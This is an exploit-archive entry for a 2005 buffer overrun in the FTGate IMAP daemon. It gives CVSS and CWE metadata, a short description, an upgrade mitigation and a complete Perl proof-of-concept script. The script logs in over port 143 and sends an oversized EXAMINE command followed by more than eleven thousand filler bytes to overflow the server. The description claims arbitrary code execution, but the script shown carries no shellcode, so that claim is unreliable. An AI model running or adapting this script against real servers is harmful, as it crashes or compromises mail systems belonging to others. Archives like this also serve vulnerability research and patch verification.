FTGate Imapd BufferOverrun

vendor:

Imapd

by:

Luca Ercoli

7,5

CVSS

HIGH

Buffer Overrun

120 (Buffer Copy without Checking Size of Input)

CWE

Product Name: Imapd

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

This exploit is for FTGate Imapd BufferOverrun vulnerability. It uses IO::Socket to connect to the host on port 143 and sends a malicious payload of 224 bytes followed by 11305 bytes of C characters. This causes a buffer overflow and allows the attacker to execute arbitrary code.

Mitigation:

Upgrade to the latest version of FTGate Imapd.

Source

Exploit-DB raw data:

#!/usr/bin/perl

use IO::Socket;

print "\nFTGate Imapd BufferOverrun\nLuca Ercoli io\@lucaercoli.it\n";
print "http://www.lucaercoli.it\n\n\n";

$host = "localhost";

$remote = IO::Socket::INET->new ( Proto => "tcp",
PeerAddr => $host,
PeerPort => "143",
);

unless ($remote) { die "Can't connect to $host" }

print "[!] Connected\n";
print "[?] Exploiting...\n";

sleep(1);

my $imapd = join ("", "1 login user pass", "\r\n");

print $remote $imapd;

sleep(1);
my $imapd = join ("", "1 EXAMINE ", "B"x(224), "\r\n");
print $remote $imapd;
sleep(1);
my $imapd = join ("","C"x(11305), "\r\n");
print $remote $imapd;

print "\n[!] Done\n\n\n";

close $remote;

# milw0rm.com [2005-11-16]